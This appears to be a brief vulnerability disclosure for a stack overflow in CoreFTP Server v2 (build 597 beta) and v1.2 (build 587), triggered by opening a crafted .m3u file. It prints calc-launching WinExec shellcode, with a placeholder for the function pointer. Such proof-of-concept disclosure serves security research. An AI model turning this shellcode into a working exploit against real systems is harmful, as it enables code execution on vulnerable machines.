Stack Overflow at both of CoreFTP Server v2 (build 597 beta) and v1.2 (build 587) – Log Path

In the name of Allah, the Most Gracious, the Most Merciful.


Description: A simple Stack Overflow that affects both of CoreFTP Server v2 (build 597 beta) and CoreFTP Server version 1.2 (build 587). This Stack Overflow was triggered by open the .m3u file with the vulnerable software.


Reference:

Both of CoreFTP v2 (build 597 beta) and v1.2 (build 587) Stack Overflow – calc.exe (Mar 06th, 2016)

Vulnerable App:


Test at: Windows XP SP3.

Pop up the Calculator:

\x33\xc0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x6A\x01\x50\xBB\xAD\x23\x86\x7C\xFF\xD3\x50\xBB\x??\x??\x??\x??\xFF\xD3 

Replace the \x??\x??\x??\x?? with the value of Pointer to WinExec (by using arwin).

Share

You may also like...